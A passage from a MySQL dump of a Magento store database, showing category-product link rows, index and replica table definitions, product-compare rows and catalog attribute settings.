--
-- Dumping data for table `catalog_category_product`
--

INSERT INTO `catalog_category_product` (`entity_id`, `category_id`, `product_id`, `position`) VALUES
(5188, 2, 2052, 0),
(5191, 2, 2053, 0),
(5194, 6, 2054, 0),
(5195, 8, 2054, 0),
(5196, 4, 2055, 0),
(5197, 43, 2055, 0),
(5203, 4, 2057, 0),
(5204, 6, 2057, 0),
(5207, 43, 2057, 0),
(5208, 2, 2058, 0),
(5209, 4, 2058, 0),
(5210, 43, 2058, 0),
(5211, 6, 2058, 0),
(5212, 2, 2059, 0),
(5214, 43, 2059, 0),
(5215, 6, 2059, 0),
(5216, 46, 2060, 0),
(5217, 4, 2061, 0),
(5218, 46, 2061, 0),
(5220, 6, 2061, 0),
(5221, 46, 2062, 0),
(5222, 2, 2062, 0),
(5223, 46, 2063, 0),
(5224, 4, 2064, 0),
(5225, 46, 2064, 0);

-- --------------------------------------------------------

--
-- Table structure for table `catalog_category_product_index`
--

CREATE TABLE `catalog_category_product_index` (
  `category_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Category ID',
  `product_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product ID',
  `position` int(11) DEFAULT NULL COMMENT 'Position',
  `is_parent` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Parent',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `visibility` smallint(5) UNSIGNED NOT NULL COMMENT 'Visibility'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Category Product Index';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_category_product_index_replica`
--

CREATE TABLE `catalog_category_product_index_replica` (
  `category_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Category ID',
  `product_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product ID',
  `position` int(11) DEFAULT NULL COMMENT 'Position',
  `is_parent` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Parent',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `visibility` smallint(5) UNSIGNED NOT NULL COMMENT 'Visibility'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Category Product Index';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_category_product_index_store1`
--

CREATE TABLE `catalog_category_product_index_store1` (
  `category_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Category Id',
  `product_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product Id',
  `position` int(11) DEFAULT NULL COMMENT 'Position',
  `is_parent` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Parent',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store Id',
  `visibility` smallint(5) UNSIGNED NOT NULL COMMENT 'Visibility'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Category Product Index Store1';

--
-- Dumping data for table `catalog_category_product_index_store1`
--

INSERT INTO `catalog_category_product_index_store1` (`category_id`, `product_id`, `position`, `is_parent`, `store_id`, `visibility`) VALUES
(2, 2058, 0, 0, 1, 4),
(2, 2059, 0, 0, 1, 4),
(2, 2062, 0, 0, 1, 4),
(2, 2054, 10000, 0, 1, 4),
(2, 2055, 10000, 0, 1, 4),
(2, 2057, 10000, 0, 1, 4),
(2, 2060, 10000, 0, 1, 4),
(2, 2061, 10000, 0, 1, 4),
(2, 2063, 10000, 0, 1, 4),
(2, 2064, 10000, 0, 1, 4),
(2, 2053, 0, 1, 1, 4),
(4, 2055, 0, 1, 1, 4),
(4, 2057, 0, 1, 1, 4),
(4, 2058, 0, 1, 1, 4),
(4, 2061, 0, 1, 1, 4),
(4, 2064, 0, 1, 1, 4),
(6, 2054, 0, 1, 1, 4),
(6, 2057, 0, 1, 1, 4),
(6, 2058, 0, 1, 1, 4),
(6, 2059, 0, 1, 1, 4),
(6, 2061, 0, 1, 1, 4),
(8, 2054, 0, 1, 1, 4),
(43, 2055, 0, 1, 1, 4),
(43, 2057, 0, 1, 1, 4),
(43, 2058, 0, 1, 1, 4),
(43, 2059, 0, 1, 1, 4),
(46, 2060, 0, 1, 1, 4),
(46, 2061, 0, 1, 1, 4),
(46, 2062, 0, 1, 1, 4),
(46, 2063, 0, 1, 1, 4),
(46, 2064, 0, 1, 1, 4);

-- --------------------------------------------------------

--
-- Table structure for table `catalog_category_product_index_store1_replica`
--

CREATE TABLE `catalog_category_product_index_store1_replica` (
  `category_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Category Id',
  `product_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product Id',
  `position` int(11) DEFAULT NULL COMMENT 'Position',
  `is_parent` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Parent',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store Id',
  `visibility` smallint(5) UNSIGNED NOT NULL COMMENT 'Visibility'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Category Product Index Store1 Replica';

--
-- Dumping data for table `catalog_category_product_index_store1_replica`
--

INSERT INTO `catalog_category_product_index_store1_replica` (`category_id`, `product_id`, `position`, `is_parent`, `store_id`, `visibility`) VALUES
(2, 2058, 0, 0, 1, 4),
(2, 2059, 0, 0, 1, 4),
(2, 2062, 0, 0, 1, 4),
(2, 2054, 10000, 0, 1, 4),
(2, 2055, 10000, 0, 1, 4),
(2, 2057, 10000, 0, 1, 4),
(2, 2060, 10000, 0, 1, 4),
(2, 2061, 10000, 0, 1, 4),
(2, 2063, 10000, 0, 1, 4),
(2, 2064, 10000, 0, 1, 4),
(2, 2053, 0, 1, 1, 4),
(4, 2055, 0, 1, 1, 4),
(4, 2057, 0, 1, 1, 4),
(4, 2058, 0, 1, 1, 4),
(4, 2061, 0, 1, 1, 4),
(4, 2064, 0, 1, 1, 4),
(6, 2054, 0, 1, 1, 4),
(6, 2057, 0, 1, 1, 4),
(6, 2058, 0, 1, 1, 4),
(6, 2059, 0, 1, 1, 4),
(6, 2061, 0, 1, 1, 4),
(8, 2054, 0, 1, 1, 4),
(43, 2055, 0, 1, 1, 4),
(43, 2057, 0, 1, 1, 4),
(43, 2058, 0, 1, 1, 4),
(43, 2059, 0, 1, 1, 4),
(46, 2060, 0, 1, 1, 4),
(46, 2061, 0, 1, 1, 4),
(46, 2062, 0, 1, 1, 4),
(46, 2063, 0, 1, 1, 4),
(46, 2064, 0, 1, 1, 4);

-- --------------------------------------------------------

--
-- Table structure for table `catalog_category_product_index_tmp`
--

CREATE TABLE `catalog_category_product_index_tmp` (
  `category_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Category ID',
  `product_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product ID',
  `position` int(11) NOT NULL DEFAULT 0 COMMENT 'Position',
  `is_parent` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Parent',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `visibility` smallint(5) UNSIGNED NOT NULL COMMENT 'Visibility'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Category Product Indexer temporary table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_compare_item`
--

CREATE TABLE `catalog_compare_item` (
  `catalog_compare_item_id` int(10) UNSIGNED NOT NULL COMMENT 'Compare Item ID',
  `visitor_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Visitor ID',
  `customer_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Customer ID',
  `product_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product ID',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Compare Table';

--
-- Dumping data for table `catalog_compare_item`
--

INSERT INTO `catalog_compare_item` (`catalog_compare_item_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`) VALUES
(1, 0, 14, 2064, 1),
(2, 45, NULL, 2062, 1),
(3, 61, 6, 2062, 1),
(4, 3043, NULL, 2058, 1);

-- --------------------------------------------------------

--
-- Table structure for table `catalog_eav_attribute`
--

CREATE TABLE `catalog_eav_attribute` (
  `attribute_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Attribute ID',
  `frontend_input_renderer` varchar(255) DEFAULT NULL COMMENT 'Frontend Input Renderer',
  `is_global` smallint(5) UNSIGNED NOT NULL DEFAULT 1 COMMENT 'Is Global',
  `is_visible` smallint(5) UNSIGNED NOT NULL DEFAULT 1 COMMENT 'Is Visible',
  `is_searchable` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Searchable',
  `is_filterable` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Filterable',
  `is_comparable` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Comparable',
  `is_visible_on_front` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Visible On Front',
  `is_html_allowed_on_front` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is HTML Allowed On Front',
  `is_used_for_price_rules` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Used For Price Rules',
  `is_filterable_in_search` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Filterable In Search',
  `used_in_product_listing` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Used In Product Listing',
  `used_for_sort_by` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Used For Sorting',
  `apply_to` varchar(255) DEFAULT NULL COMMENT 'Apply To',
  `is_visible_in_advanced_search` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Visible In Advanced Search',
  `position` int(11) NOT NULL DEFAULT 0 COMMENT 'Position',
  `is_wysiwyg_enabled` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is WYSIWYG Enabled',
  `is_used_for_promo_rules` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Used For Promo Rules',
  `is_required_in_admin_store` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Required In Admin Store',
  `is_used_in_grid` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Used in Grid',
  `is_visible_in_grid` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Visible in Grid',
  `is_filterable_in_grid` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Filterable in Grid',
  `search_weight` float NOT NULL DEFAULT 1 COMMENT 'Search Weight',
  `additional_data` text DEFAULT NULL COMMENT 'Additional swatch attributes data'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog EAV Attribute Table';

--
-- Dumping data for table `catalog_eav_attribute`
--

INSERT INTO `catalog_eav_attribute` (`attribute_id`, `frontend_input_renderer`, `is_global`, `is_visible`, `is_searchable`, `is_filterable`, `is_comparable`, `is_visible_on_front`, `is_html_allowed_on_front`, `is_used_for_price_rules`, `is_filterable_in_search`, `used_in_product_listing`, `used_for_sort_by`, `apply_to`, `is_visible_in_advanced_search`, `position`, `is_wysiwyg_enabled`, `is_used_for_promo_rules`, `is_required_in_admin_store`, `is_used_in_grid`, `is_visible_in_grid`, `is_filterable_in_grid`, `search_weight`, `additional_data`) VALUES
(45, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(46, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(47, NULL, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, NULL, 0, 0, 1, 0, 0, 0, 0, 0, 1, NULL),
(48, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(49, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(50, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(51, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(52, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(53, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(54, NULL, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(55, NULL, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(56, NULL, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(57, NULL, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(58, NULL, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(59, NULL, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(60, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(61, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(62, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(63, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(64, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(65, NULL, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(66, NULL, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(67, 'Magento\\Catalog\\Block\\Adminhtml\\Category\\Helper\\Sortby\\Available', 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(68, 'Magento\\Catalog\\Block\\Adminhtml\\Category\\Helper\\Sortby\\DefaultSortby', 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(69, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(70, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(71, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(72, 'Magento\\Catalog\\Block\\Adminhtml\\Category\\Helper\\Pricestep', 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(73, NULL, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, NULL, 1, 0, 0, 0, 0, 0, 0, 0, 5, NULL),
(74, NULL, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 0, NULL, 1, 0, 0, 1, 0, 0, 0, 0, 6, NULL),
(75, NULL, 0, 1, 1, 0, 1, 0, 1, 0, 0, 0, 0, NULL, 1, 0, 1, 0, 0, 0, 0, 0, 1, NULL),
(76, NULL, 0, 1, 1, 0, 1, 0, 1, 0, 0, 1, 0, NULL, 1, 0, 1, 0, 0, 1, 0, 0, 1, NULL),
(77, NULL, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 'simple,virtual,configurable,downloadable,bundle', 1, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(78, NULL, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 'simple,virtual,configurable,downloadable,bundle', 0, 0, 0, 0, 0, 1, 0, 1, 1, NULL),
(79, NULL, 2, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 'simple,virtual,configurable,downloadable,bundle', 0, 0, 0, 0, 0, 1, 0, 0, 1, NULL),
(80, NULL, 2, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 'simple,virtual,configurable,downloadable,bundle', 0, 0, 0, 0, 0, 1, 0, 0, 1, NULL),
(81, NULL, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 'simple,virtual,downloadable', 0, 0, 0, 0, 0, 1, 0, 1, 1, NULL),
(82, 'Magento\\Catalog\\Block\\Adminhtml\\Product\\Helper\\Form\\Weight', 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 'simple,virtual,configurable,downloadable,bundle', 0, 0, 0, 0, 0, 1, 0, 1, 1, NULL),
(83, NULL, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 'simple,configurable', 1, 0, 0, 0, 0, 1, 0, 1, 1, NULL),
(84, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 1, 0, 1, 1, NULL),
(85, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 1, 0, 1, 1, NULL),
(86, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 1, 0, 1, 1, NULL),
(87, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(88, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(89, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(90, NULL, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(91, NULL, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(92, NULL, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 'simple,virtual,downloadable,bundle', 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(93, NULL, 1, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 'simple,virtual,configurable', 0, 0, 0, 1, 0, 1, 0, 1, 1, '{\"swatch_input_type\":\"visual\",\"update_product_preview_image\":1,\"use_product_image_for_swatch\":0}'),
(94, NULL, 2, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, NULL, 0, 0, 0, 0, 0, 1, 0, 0, 1, NULL),
(95, NULL, 2, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, NULL, 0, 0, 0, 0, 0, 1, 0, 0, 1, NULL),
(96, NULL, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(97, 'Magento\\Framework\\Data\\Form\\Element\\Hidden', 2, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, NULL, 0, 0, 0, 0, 1, 0, 0, 0, 1, NULL),
(98, NULL, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 'simple,virtual,configurable,downloadable,bundle', 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(99, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 1, 0, 0, 0, 1, NULL),
(100, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 1, 0, 1, 1, NULL),
(101, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 1, 0, 0, 1, NULL),
(102, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 1, 0, 0, 1, NULL),
(103, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(104, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 1, 0, 0, 1, NULL),
(105, 'Magento\\Catalog\\Block\\Adminhtml\\Product\\Helper\\Form\\Category', 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(106, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(107, NULL, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(108, NULL, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(109, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(110, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(111, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(112, NULL, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(113, NULL, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(114, NULL, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 'simple,bundle,configurable,grouped', 0, 0, 0, 0, 0, 1, 0, 1, 1, NULL),
(115, 'Magento\\CatalogInventory\\Block\\Adminhtml\\Form\\Field\\Stock', 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(116, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 1, 0, 0, 1, NULL),
(117, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(118, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(119, 'Magento\\Msrp\\Block\\Adminhtml\\Product\\Helper\\Form\\Type', 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 'simple,virtual,downloadable,bundle,configurable', 0, 0, 0, 0, 0, 1, 0, 1, 1, NULL),
(120, 'Magento\\Msrp\\Block\\Adminhtml\\Product\\Helper\\Form\\Type\\Price', 2, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 'simple,virtual,downloadable,bundle,configurable', 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(121, NULL, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(122, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(123, NULL, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, NULL, 0, 0, 0, 0, 0, 1, 0, 1, 1, NULL),
(124, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(125, NULL, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 'downloadable', 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(126, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 'downloadable', 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(127, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 'downloadable', 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(128, NULL, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 'downloadable', 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(129, 'Magento\\GiftMessage\\Block\\Adminhtml\\Product\\Helper\\Form\\Config', 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, 0, 0, 0, 0, 1, 0, 0, 1, NULL),
(130, NULL, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 'simple,downloadable,virtual,bundle,configurable', 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(131, NULL, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 'bundle', 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(132, NULL, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 'bundle', 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(133, NULL, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 'bundle', 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(134, NULL, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 'bundle', 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(135, NULL, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 'bundle', 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(136, NULL, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, NULL, 0, 0, 0, 0, 0, 0, 0, 0, 1, NULL),
(137, NULL, 2, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 'simple,virtual,configurable,downloadable,bundle', 0, 0, 0, 0, 0, 1, 0, 1, 1, NULL),
(138, NULL, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 0, NULL, 0, 0, 0, 1, 0, 0, 0, 0, 1, NULL),
(139, NULL, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 0, NULL, 0, 0, 0, 1, 0, 0, 0, 0, 1, NULL),
(140, NULL, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 0, NULL, 0, 0, 0, 1, 0, 0, 0, 0, 1, NULL),
(141, NULL, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 0, NULL, 0, 0, 0, 1, 0, 0, 0, 0, 1, NULL),
(142, NULL, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 0, NULL, 0, 0, 0, 1, 0, 0, 0, 0, 1, NULL),
(143, NULL, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 0, NULL, 0, 0, 0, 1, 0, 0, 0, 0, 1, NULL),
(144, NULL, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 0, NULL, 0, 0, 0, 1, 0, 0, 0, 0, 1, NULL),
(145, NULL, 1, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, NULL, 0, 0, 0, 1, 0, 0, 0, 0, 1, '{\"swatch_input_type\":\"text\",\"update_product_preview_image\":1,\"use_product_image_for_swatch\":0}'),
(146, NULL, 1, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, NULL, 0, 0, 0, 1, 0, 0, 0, 0, 1, NULL),
(147, NULL, 1, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, NULL, 0, 0, 0, 1, 0, 0, 0, 0, 1, NULL),
(148, NULL, 1, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, NULL, 0, 0, 0, 1, 0, 0, 0, 0, 1, NULL),
(149, NULL, 1, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, NULL, 0, 0, 0, 1, 0, 0, 0, 0, 1, NULL),
(150, NULL, 1, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, NULL, 0, 0, 0, 1, 0, 0, 0, 0, 1, NULL),
(151, NULL, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 0, NULL, 0, 0, 0, 1, 0, 0, 0, 0, 1, NULL),
(152, NULL, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 0, NULL, 0, 0, 0, 1, 0, 0, 0, 0, 1, NULL),
(153, NULL, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 0, NULL, 0, 0, 0, 1, 0, 0, 0, 0, 1, NULL),
(154, NULL, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 0, NULL, 0, 0, 0, 1, 0, 0, 0, 0, 1, NULL),
